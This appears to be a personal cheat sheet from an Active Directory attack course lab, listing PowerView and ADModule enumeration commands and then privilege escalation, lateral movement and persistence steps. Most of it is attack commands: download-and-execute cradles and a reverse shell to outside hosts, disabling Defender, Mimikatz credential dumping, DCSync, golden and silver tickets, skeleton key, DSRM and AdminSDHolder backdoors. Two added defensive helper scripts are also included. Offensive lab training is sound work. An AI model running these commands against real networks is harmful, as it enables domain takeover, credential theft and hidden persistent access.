# ADModule & PowerView commands, manual testing

## Intro

```powershell
$psversiontable
Get-Help
Get-Help Get-Help
Get-Command
Get-Help *
Get-Help process
Get-Help *process*
Get-Help about_*
Update-Help
Get-Help Get-Item -Full
Get-Help Get-Help -Full
Get-Help Get-Item -Examples
Get-Help Get-Help -Examples | more
Get-Help Get-Process -Parameter Name
Get-Command -CommandType cmdlet                  # lists all cmdlets in the current PS session
Get-Command -CommandType cmdlet | Measure-Object
Get-Command -Name *process*
Get-Command -Verb Set
# dir in PS is an alias of a cmdlet
Get-Alias -Definition Get-ChildItem
Get-Alias -Name dir
Get-Alias dir
Get-Process
```

Execution policy:

```powershell
powershell -ExecutionPolicy bypass
powershell -ep bypass
powershell -c <cmd>
powershell -encodedcommand
$env:PSExecutionPolicyPreference = "bypass"
Set-MpPreference -DisableRealtimeMonitoring $true   # disables Windows Defender real-time monitoring (requires admin)
```

Modules:

```powershell
Import-Module <modulepath>
Get-Command -Module <modulename>
Get-Module -ListAvailable        # modules available in the session
Get-Command -Module PowerUpSQL
```

### AppLocker

Check the language mode first:

```powershell
[dcorp-adminsrv.dollarcorp.moneycorp.local]: PS C:\Users\studentadmin\Documents> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
```

Now, let's enumerate the AppLocker policy:

```powershell
[dcorp-adminsrv.dollarcorp.moneycorp.local]: PS C:\Users\studentx\Documents> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
```

### Executing scripts

1. `powershell -encodedcommand` (limit 2000 chars)
2. PowerShell download and exec (cradles: https://github.com/danielbohannon/Invoke-CradleCrafter):

```powershell
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response
# PSv3 onwards
iex (iwr 'http://192.168.230.1/evil.ps1')
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
```

```powershell
PS C:\Users\student90> Get-ExecutionPolicy
RemoteSigned
```

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7

## Domain enumeration

https://github.com/samratashok/ADModule

```powershell
$ADClass = [System.DirectoryServices.ActiveDirectory.Domain]
$ADClass::GetCurrentDomain()
cd c:\AD\Tools
```

Bypass AMSI so that PowerView can be loaded (otherwise it is blocked by AV): https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell, patching AmsiScanBuffer in amsi.dll (rasta-mouse).

```powershell
. .\PowerView_dev.ps1
```

### Domain, policy, domain controllers

```powershell
Get-Domain
Get-Domain -Domain moneycorp.local     # if we have the right to (a trust relationship exists)
Get-DomainSID
Get-DomainPolicy
(Get-DomainPolicy).systemaccess
(Get-DomainPolicy).KerberosPolicy
Get-DomainPolicy -domain moneycorp.local
Get-DomainController
Get-DomainController -Domain moneycorp.local
```

### Users

```powershell
Get-DomainUser
Get-DomainUser -Properties samaccountname
Get-DomainUser | select name
Get-DomainUser | select cn
Get-DomainUser -Identity student90
Get-DomainUser -Domain powershell.local
```

Honeytoken detection:

```powershell
Get-DomainUser -Properties samaccountname,pwdlastset    # a normal account's password was not last set several years ago
Get-DomainUser -Properties samaccountname,badpwdcount   # a normal user's badpwdcount is not 0
Get-DomainUser -Properties samaccountname,logoncount    # a normal user's logoncount is not 0
```

Passwords and hints in descriptions:

```powershell
Get-DomainObject | ? {$_.description -like '*built*'} | select samaccountname,description
Get-DomainObject | ? {$_.description -like '*pass*'} | select samaccountname,description
Get-DomainObject -Properties name,Description | ?{$_.description -ne $null}
```

### Computers

```powershell
Get-DomainComputer
Get-DomainComputer -Properties dnshostname
Get-DomainComputer -OperatingSystem "*Server 2016*" -Properties dnshostname
Get-DomainComputer | select operatingsystem
Get-DomainComputer -Ping -Properties dnshostname
```

### Groups

```powershell
Get-DomainGroup
Get-DomainGroup "domain admins"
Get-DomainGroup "*admin*"
Get-DomainGroup "*admin*" -Domain moneycorp.local -Properties samaccountname   # also returns Enterprise Admins, which exist only in the forest root domain
Get-DomainGroup -UserName student | select samaccountname                     # all groups of a user
Get-DomainGroupMember "domain admins"
Get-DomainGroupMember "enterprise admins" -Domain moneycorp.local
Get-DomainGroupMember "administrators" -Recurse
Get-DomainGroup -MemberIdentity "student90" | select samaccountname            # show all groups of a user
Get-NetLocalGroup -ComputerName dollarcorp.moneycorp.local   # list of local groups; without admin rights this only works against the DC
Get-NetLocalGroup -ComputerName us-exchange -Verbose         # access denied
Get-NetLocalGroupMember -ComputerName us-dc -GroupName Administrators
```

### Logged-on users

1. Get-LoggedOnLocal ~ Get-RegLoggedOn
2. Get-NetLoggedon (admin)
3. Get-NetSession
4. Get-LastLoggedOn -ComputerName <servername> (admin)

```powershell
Get-DomainComputer | Get-NetLoggedon     # lists users only on the machines where I am admin
Get-DomainComputer | Get-RegLoggedOn
Get-DomainComputer | Get-NetSession
Get-DomainController | Get-NetSession    # find domain admin sessions coming from other machines
Get-NetSession -ComputerName DC
Get-LastLoggedOn -ComputerName DCORP-ADMINSRV
Get-LoggedonLocal -ComputerName dcorp-dc.dollarcorp.moneycorp.local
```

### Shares and file servers

```powershell
# Invoke-ShareFinder ~ Find-DomainShare
Find-DomainShare -Verbose -CheckShareAccess
# only in old PowerView 2:
Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC
# Find-InterestingDomainShareFile ~ Invoke-FileFinder
Invoke-FileFinder -Verbose
# Get-NetFileServer ~ Get-DomainFileServer
Get-DomainFileServer    # high-value targets in the domain (file servers with many users logged on)
```

### GPO

ADModule cannot enumerate GPOs; PowerView cannot retrieve the contents of a GPO.

```powershell
# Get-DomainGPO ~ Get-NetGPO
Get-DomainGPO | select displayname        # show all GPOs
Get-DomainGPOLocalGroup                   # show Restricted Groups
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity us-mgmt.us.techcorp.local   # users placed in a local group of a machine via GPO
Get-DomainGPOUserLocalGroupMapping -Identity studentuser1 -Verbose                   # machines where the given user is a member of a specific group
Get-NetGPO -ComputerName DCORP-STUDENT90.dollarcorp.moneycorp.local | select displayname   # GPOs for a specific computer
gpresult /R                               # which GPOs are applied to the current machine
Get-NetGPOGroup                           # show restricted groups
```
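The honeytoken heuristics listed under "Users" (password last set years ago, badpwdcount 0, logoncount 0) are easy to apply by hand to a few accounts but tedious across a whole domain. The function below is an added example, not part of the original notes: it scores user objects against exactly those three heuristics and reports the reasons, which is equally useful for a defender checking whether a deployed decoy account looks realistic. It assumes the property names of `Get-ADUser -Properties pwdLastSet,badPwdCount,logonCount,whenCreated` (PowerView's `Get-DomainUser` output also works, since it returns pwdlastset as a DateTime); the thresholds and the sample accounts are constructed.

```powershell
# Added example (not from the original notes): applies the three honeytoken / stale-account
# heuristics to user objects and reports a score and the reasons.
# Assumptions: property names as returned by Get-ADUser -Properties pwdLastSet,badPwdCount,logonCount,whenCreated;
# thresholds are arbitrary defaults.
function Test-DecoyAccountIndicators {
    [CmdletBinding()]
    param(
        [Parameter(ValueFromPipeline, Mandatory)] $Account,
        [int]$MaxPasswordAgeYears = 3,     # pwdLastSet older than this is suspicious
        [int]$MinAccountAgeDays = 90       # ignore zero counters on accounts younger than this
    )
    process {
        $now = (Get-Date).ToUniversalTime()
        $reasons = @()

        # pwdLastSet is an Int64 FILETIME from Get-ADUser, already a DateTime from PowerView
        $pwdSet = $Account.pwdLastSet
        if ($pwdSet -is [long]) {
            $pwdSet = if ($pwdSet -gt 0) { [DateTime]::FromFileTimeUtc($pwdSet) } else { $null }
        }
        if ($pwdSet -and $pwdSet -lt $now.AddYears(-$MaxPasswordAgeYears)) {
            $reasons += "pwdLastSet $($pwdSet.ToString('yyyy-MM-dd')) is older than $MaxPasswordAgeYears years"
        }

        # zero counters only mean something on an account old enough to have been used
        $ageDays = if ($Account.whenCreated) { ($now - [DateTime]$Account.whenCreated).TotalDays } else { $null }
        if ($ageDays -ne $null -and $ageDays -ge $MinAccountAgeDays) {
            if ([int]$Account.logonCount -eq 0)  { $reasons += "logonCount is 0 on an account $([int]$ageDays) days old" }
            if ([int]$Account.badPwdCount -eq 0) { $reasons += "badPwdCount is 0 (never mistyped a password)" }
        }

        [pscustomobject]@{
            SamAccountName = $Account.samAccountName
            Score          = $reasons.Count    # 0..3; 3 = matches every heuristic
            Reasons        = $reasons -join '; '
        }
    }
}

# Constructed sample input (not real accounts) so the function can be exercised offline
$sampleAccounts = @(
    [pscustomobject]@{ samAccountName = 'jdoe';    pwdLastSet = (Get-Date).AddDays(-20).ToFileTimeUtc(); badPwdCount = 1; logonCount = 342; whenCreated = (Get-Date).AddYears(-4) }
    [pscustomobject]@{ samAccountName = 'svc_bak'; pwdLastSet = (Get-Date).AddYears(-5).ToFileTimeUtc(); badPwdCount = 0; logonCount = 0;   whenCreated = (Get-Date).AddYears(-5) }
    [pscustomobject]@{ samAccountName = 'newhire'; pwdLastSet = (Get-Date).AddDays(-2).ToFileTimeUtc();  badPwdCount = 0; logonCount = 0;   whenCreated = (Get-Date).AddDays(-2) }
)
$sampleAccounts | Test-DecoyAccountIndicators | Sort-Object Score -Descending | Format-Table -AutoSize
# jdoe -> 0, svc_bak -> 3, newhire -> 0 (too young for the counter heuristics)

# Against a live domain with the AD module loaded:
# Get-ADUser -Filter * -Properties pwdLastSet,badPwdCount,logonCount,whenCreated |
#     Test-DecoyAccountIndicators | Where-Object Score -ge 2
```

Two caveats worth keeping in mind when reading the results: logonCount and badPwdCount are not replicated between domain controllers, so a single DC only knows about the logons it handled itself; and a genuine service account that authenticates with a keytab or a managed password can legitimately show badPwdCount 0 forever, which is why the function reports a score and the reasons rather than a verdict.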
```powershell
Find-GPOComputerAdmin -Computername dcorp-student1.dollarcorp.moneycorp.local
Find-GPOLocation -UserName student1 -Verbose
```

### OUs

```powershell
Get-DomainOU
Get-DomainOU | select name
Get-DomainOU | select displayname
(Get-DomainOU -Identity Students).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name   # computers in the Students OU
Get-DomainOU                                  # the gplink field holds the identifier of the GPO applied to the OU
(Get-DomainOU -Identity Students).gplink
Get-DomainGPO -Identity "{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}"   # get a GPO by its identifier
```

### ACLs

Only PowerView 2 resolves SIDs.

```powershell
Get-ObjectAcl -SamAccountName student90 -ResolveGUIDs
# ACL of the student90 object: ObjectDN - target object, IdentityReference - principal (subject),
# ActiveDirectoryRights - rights, AccessControlType - ACE type, objectSID - identifier of the object whose ACL is shown
Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose
```

PW2:

```powershell
Get-ObjectACL -DistinguishedName "DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs |
    ? {($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'GenericWrite') -or ($_.ActiveDirectoryRights -match 'WriteDacl') -or ($_.ActiveDirectoryRights -match 'WriteOwner') -or ($_.ActiveDirectoryRights -match 'ExtendedRight') -or ($_.ActiveDirectoryRights -match 'WriteProperty') } |
    select identityreference
```

PW3 (Get-DomainObjectACL):

```powershell
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose
Get-DomainObjectAcl -Identity studentuser1 -ResolveGUIDs
Get-DomainObjectAcl -Searchbase "LDAP://CN=Domain Admins,CN=Users,DC=us,DC=techcorp,DC" -ResolveGUIDs -Verbose
```

Principals with interesting rights on the domain object, resolved to names:

```powershell
Get-ObjectACL "DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs |
    ? {($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'GenericWrite') -or ($_.ActiveDirectoryRights -match 'WriteDacl') -or ($_.ActiveDirectoryRights -match 'WriteOwner') -or ($_.ActiveDirectoryRights -match 'WriteProperty') -or ($_.ObjectAceType -match 'Replication-Get') } |
    sort SecurityIdentifier -Descending -unique | select SecurityIdentifier | foreach {$_.SecurityIdentifier} | Convert-SidToName

Get-ObjectACL -ResolveGUIDs |
    ? {($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'GenericWrite') -or ($_.ActiveDirectoryRights -match 'WriteDacl') -or ($_.ActiveDirectoryRights -match 'WriteOwner') -or ($_.ActiveDirectoryRights -match 'WriteProperty') -or ($_.ObjectAceType -match 'Replication-Get') } |
    select SecurityIdentifier,objectdn,ActiveDirectoryRights |
    foreach { 'Subject: {0} --- Object: {1} --- Right: {2}' -f (Convert-SidToName $_.SecurityIdentifier), $_.ObjectDN, $_.ActiveDirectoryRights}

Get-ObjectACL "DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs | ? {($_.ObjectAceType -match 'Replication-Get') } | select securityidentifier
Convert-SidToName S-1-5-21-1874506631-3219952063-538504511-512
```

PW3:

```powershell
Find-InterestingDomainAcl -ResolveGUIDs
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "studentuserx"}   # objects on which the user studentuserx has interesting rights
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "StudentUsers"}   # objects on which the group StudentUsers has interesting rights
Invoke-ACLScanner -ResolveGUIDs                                                    # finds interesting ACLs with write rights (PW3: Find-InterestingDomainAcl)
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}    # can be filtered by user or group
Get-PathAcl -Path "\\us-dc\sysvol"
```

### Trusts

```powershell
Get-DomainTrust                 # PW3
Get-NetDomainTrust              # PW2, more readable output
Get-NetDomainTrust -Domain us.dollarcorp.moneycorp.local
Get-Forest
Get-ForestDomain                # domains in the forest
Get-ForestTrust
Get-ForestTrust -Forest eurocorp.local
```

### Checking for local admin rights on machines

1. dir \\ip\C$
2. OpenSCManagerW (Find-LocalAdminAccess)
3. WMI (Find-WMILocalAdminAccess)
4. PSRemoting (Find-PSRemotingLocalAdminAccess)

```powershell
Find-LocalAdminAccess -Verbose              # PW2; uses the OpenSCManagerW Win32 API call to establish a handle to the remote host
Get-DomainComputer -Properties dnshostname  # save the list into computers.txt
. .\Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess                    # walks all machines in the domain by itself; simply runs a WMI command against the specified list of computers
Find-WMILocalAdminAccess -ComputerFile .\computers.txt -Verbose
. .\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
Invoke-EnumerateLocalAdmin -Verbose         # enumerate all local admins on all machines (on >= 2012 local admin rights are required);
                                            # PW3: Find-DomainLocalGroupMember; Administrators by default, but another group can be given
```
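The "interesting rights" filters above depend on PowerView, which the AMSI note earlier shows is often blocked. The block below is an added example, not part of the original notes: it rebuilds the same filter (GenericAll, GenericWrite, WriteDacl, WriteOwner, WriteProperty, ExtendedRight, plus the two replication extended rights) on top of the built-in `AD:` PSDrive, so a defender can review the DACL of the domain head or of `AdminSDHolder` with nothing but the AD module. The well-known replication GUIDs and the default-trustee patterns are my assumptions, and the sample ACEs at the bottom are constructed so the filter can be exercised offline.

```powershell
# Added example (not from the original notes): the PowerView "interesting rights" filter
# rebuilt on the built-in AD: drive. Assumptions: replication GUIDs and default-trustee
# patterns are the well-known ones; the sample ACEs below are constructed.
$script:DangerousRights  = 'GenericAll','GenericWrite','WriteDacl','WriteOwner','WriteProperty','ExtendedRight'
$script:ReplicationGuids = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
}
$script:DefaultTrustees = '\\Domain Admins$','\\Enterprise Admins$','^BUILTIN\\Administrators$',
                          '^NT AUTHORITY\\SYSTEM$','^NT AUTHORITY\\SELF$','^NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS$'

function Select-DangerousAce {
    [CmdletBinding()]
    param(
        [Parameter(ValueFromPipeline, Mandatory)] $Ace,   # one entry of (Get-Acl 'AD:\...').Access
        [string]$ObjectDN = ''
    )
    process {
        if ("$($Ace.AccessControlType)" -ne 'Allow') { return }
        $trustee = "$($Ace.IdentityReference)"
        foreach ($p in $script:DefaultTrustees) { if ($trustee -match $p) { return } }

        $rights = "$($Ace.ActiveDirectoryRights)" -split ',\s*'
        $hits   = @($rights | Where-Object { $_ -in $script:DangerousRights })
        $guid   = "$($Ace.ObjectType)".ToLower()
        if ($script:ReplicationGuids.ContainsKey($guid)) { $hits += $script:ReplicationGuids[$guid] }
        if ($hits.Count -eq 0) { return }

        [pscustomobject]@{
            Object     = $ObjectDN
            Trustee    = $trustee
            Rights     = $hits -join ','
            # the empty GUID means the right covers every attribute / every extended right;
            # a specific GUID (a single property or control right) still needs a human look
            ObjectType = if ($guid -eq '00000000-0000-0000-0000-000000000000') { '(all)' } else { $guid }
            Inherited  = [bool]$Ace.IsInherited
        }
    }
}

# Live use (AD module loaded, so the AD: PSDrive exists)
function Find-DangerousAce {
    param([Parameter(Mandatory)][string]$DistinguishedName)
    (Get-Acl -Path "AD:\$DistinguishedName").Access | Select-DangerousAce -ObjectDN $DistinguishedName
}
# Find-DangerousAce -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local'
# Find-DangerousAce -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local'

# Constructed sample ACEs shaped like the AD: drive output
$sampleAces = @(
    [pscustomobject]@{ IdentityReference='NT AUTHORITY\SYSTEM';     ActiveDirectoryRights='GenericAll';                   AccessControlType='Allow'; ObjectType='00000000-0000-0000-0000-000000000000'; IsInherited=$false }
    [pscustomobject]@{ IdentityReference='DOLLARCORP\Domain Users'; ActiveDirectoryRights='ReadProperty, GenericExecute'; AccessControlType='Allow'; ObjectType='00000000-0000-0000-0000-000000000000'; IsInherited=$true }
    [pscustomobject]@{ IdentityReference='DOLLARCORP\RDPUsers';     ActiveDirectoryRights='WriteProperty, ExtendedRight'; AccessControlType='Allow'; ObjectType='00000000-0000-0000-0000-000000000000'; IsInherited=$false }
    [pscustomobject]@{ IdentityReference='DOLLARCORP\student90';    ActiveDirectoryRights='ExtendedRight';                AccessControlType='Allow'; ObjectType='1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'; IsInherited=$false }
)
$sampleAces | Select-DangerousAce -ObjectDN 'DC=dollarcorp,DC=moneycorp,DC=local' | Format-Table -AutoSize
# expected rows: RDPUsers (WriteProperty,ExtendedRight on (all)) and student90 (ExtendedRight,DS-Replication-Get-Changes)
```

The default-trustee list is deliberately short: anything not on it is surfaced, so a first run on a real domain will also show Exchange and other product groups that legitimately hold write rights. Extend `$script:DefaultTrustees` with your own baseline rather than loosening the rights filter.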
### User hunting

```powershell
# Invoke-UserHunter ~ PW3 Find-DomainUserLocation
Find-DomainUserLocation -Stealth
Find-DomainUserLocation -CheckAccess
Invoke-UserHunter -Verbose
```

### ADModule

```powershell
cd C:\AD\Tools\ADModule-master\
Import-Module .\Microsoft.ActiveDirectory.Management.dll
Import-Module .\ActiveDirectory\ActiveDirectory.psd1
Get-ADDomain
Get-ADDomain -Identity moneycorp.local
(Get-ADDomain).DomainSID
Get-ADDomainController
Get-ADUser -Filter *
Get-ADUser -Filter * -Properties *
Get-ADUser -Filter * -Properties * | select samaccountname
Get-ADUser -Filter * | Select -ExpandProperty samaccountname
Get-ADUser -Identity student90 -Properties *
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description   # search for passwords in descriptions
Get-ADComputer -Filter * -Properties *
Get-ADComputer -Filter * -Properties * | select name,logoncount     # find fake machines with 0 logons
Get-ADComputer -Filter * | select -expand name
Get-ADComputer -Filter * -Properties * | select DNSHostName
Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
Get-ADGroup -Filter * -Properties *
Get-ADGroup -Filter * -Properties * | select name
Get-ADGroup -Identity 'Domain Admins' -Properties *
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name              # find admin groups
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADGroupMember -Identity 'Domain Admins'
Get-ADGroupMember -Identity 'Enterprise Admins'
Get-ADGroupMember -Identity 'Enterprise Admins' -Server techcorp.local   # trusted domain
Get-ADPrincipalGroupMembership -Identity student90                    # the user's groups (not recursive! does not show all of them)
Get-ADOrganizationalUnit -Identity 'OU=StudentsMachines,DC=us,DC=techcorp,DC=local' | %{Get-ADComputer -SearchBase $_ -Filter *} | select name
Get-ACL 'AD:\CN=Domain Admins,CN=Users,DC=us,DC=techcorp,DC=local' | select -ExpandProperty Access
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access
Get-ADTrust -Filter *
Get-ADTrust -Filter * -Server techcorp.local                          # view the trusts of another domain
Get-ADTrust -Identity redps.offensiveps.powershell.local
Get-ADForest
Get-ADForest -Identity eurocorp.local
(Get-ADForest).Domains
```

### Blocking NetSession enumeration (defence)

```powershell
Get-NetSession -ComputerName dc.dollarcorp.moneycorp.local -Verbose
.\Netcease.ps1                        # run on the DC: blocks NetSession enumeration (deny for Authenticated Users)
Restart-Service -Name Server -Force
```

## PRIV ESC

1. Unquoted service paths:

```powershell
Get-WmiObject -class win32_service | select name,pathname   # look for unquoted paths, e.g.:
# AbyssWebServer   C:\WebServer\Abyss Web Server\WebServer\abyssws.exe --service
. .\PowerUp.ps1
Invoke-AllChecks
Get-ServiceUnquoted -Verbose
Get-ModifiableServiceFile -Verbose
Get-ModifiableService -Verbose
Get-Help Invoke-ServiceAbuse
Invoke-ServiceAbuse -Name AbyssWebServer -UserName 'ops\labuser' -Verbose   # adds the user to local admins; then log off and log in again
```

Run all checks from:

- PowerUp: Invoke-AllChecks
- BeRoot is an executable: .\beRoot.exe
- Privesc: Invoke-PrivEsc
- plus winPEAS, https://github.com/hlldz/dazzleUP

`C:\Program ..` is a false positive: exploiting it would require writing `C:\Program.exe`, which only an admin can do.

```powershell
. .\privesc.ps1
Invoke-PrivEsc
```

### CI (Jenkins)

https://www.guru99.com/top-20-continuous-integration-tools.html

- "People" tab: enumerate local users
- Password brute force on local users: username as password, reversed username as password
- http://jenkins_server/script with admin access:

```groovy
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'whoami'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```

- Non-admin user: http://jenkins_server/job/Project0/configure; fuzz ProjectN with Burp Intruder (Sniper)

```
powershell whoami
powershell net localgroup administrators
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.83:10001/Invoke-PowerShell.ps1'));Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.83 -Port 10002
```

## BloodHound

BloodHound is for blue teamers and pentesters, not for red teamers: it is noisy and causes a network spike in the default config.

```powershell
. .\Sharphound.ps1
Invoke-BloodHound -CollectionMethod All -Verbose
Invoke-BloodHound -CollectionMethod LoggedOn
```

Start neo4j:

```
C:\AD\Tools\neo4j-community-3.5.1-windows\neo4j-community-3.5.1\bin>neo4j.bat console
```

Run bloodhound.exe, log in and change the password, log in with the new password, upload the data.

- Ctrl+K: disable labels
- right-click on a group: expand group

BH actions (my lecture):

- impacket comps
- mark all owned principals
- use all built-in queries
- path from owned to Domain Admins
- path to high value targets (Print Operators, Domain Admins, etc.)
- mark wksadmins, srvrsadmins as high value
- for the current user: node info (all props); path finding from my user to Domain Admin and from my user to machines; reachable high value targets from object

## Lateral movement

```powershell
Find-LocalAdminAccess -Verbose    # -> dcorp-adminsrv.dollarcorp.moneycorp.local
```

1. `Enter-PSSession dcorp-adminsrv.dollarcorp.moneycorp.local`
2. `$sess = New-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local; Enter-PSSession -Session $sess`
3. Invoke-Command:

```powershell
Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock {whoami;hostname}
Invoke-Command -Session $sess -ScriptBlock {whoami;hostname}
Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock {$ExecutionContext.SessionState.LanguageMode}
Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -FilePath powerup.ps1
Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -Credential dcorp\admin   # use other credentials
```

4. `winrs -r:us-mgmt cmd`

Loading a script into a remote session:

```powershell
$sess = New-PSSession -ComputerName dcorp-appsrv.dollarcorp.moneycorp.local
Enter-PSSession -Session $sess
# run the AMSI bypass command
exit
Invoke-Command -FilePath .\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession -Session $sess
Invoke-Mimikatz     # extract creds on the machine
```

Impersonate a user:

1. Invoke-Mimikatz
2. Invoke-TokenManipulation

## Persistence

### Golden ticket

```powershell
Set-MpPreference -DisableRealtimeMonitoring $true
. .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe -exec bypass"'
```

Extract krbtgt:

```powershell
$sess = New-PSSession -ComputerName dcorp-dc
Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession -Session $sess
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
# OR
. .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```

Create the ticket:

```powershell
. .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
ls \\dcorp-dc.dollarcorp.moneycorp.local\c$
```

### Silver ticket

```powershell
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:7b13b314a1f0cfa8ae280349f941bc29 /user:Administrator /ptt"'
ls \\dcorp-dc.dollarcorp.moneycorp.local\c$
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:host /rc4:7b13b314a1f0cfa8ae280349f941bc29 /user:Administrator /ptt"'
schtasks.exe /S dcorp-dc.dollarcorp.moneycorp.local
```

Run HFS (HTTP File Server) and host Invoke-PowerShellTcp.ps1:

```powershell
. .\powercat.ps1
powercat -l -v -p 443 -t 1000
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck1" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.90/Invoke-PowerShellTcp.ps1'')'"
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck1"
```

### Skeleton key

```powershell
. .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe -exec bypass"'
. .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local
Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator   # password "mimikatz"
```

### DSRM

```powershell
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc   # get the local admin hash
Enter-PSSession -Computername dcorp-dc
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior"
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'
ls \\dcorp-dc\C$
```

### Custom SSP

```powershell
Invoke-Mimikatz -Command '"misc::memssp"' -Computername dcorp-dc
```

### AdminSDHolder

```powershell
PS C:\ad\Tools> $sess2 = New-PSSession -ComputerName dcorp-dc
PS C:\ad\Tools> Invoke-Command -FilePath .\Invoke-SDPropagator.ps1 -Session $sess2
PS C:\ad\Tools> Enter-PSSession $sess2
[dcorp-dc]: PS C:\Users\svcadmin\Documents> exit
PS C:\ad\Tools> cd .\AdExplorer\
PS C:\ad\Tools\AdExplorer> .\ADExplorer.exe    # set full control on AdminSDHolder for student90; can also be done with PowerView:
. .\Powerview.ps1
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student90 -Rights All -Verbose
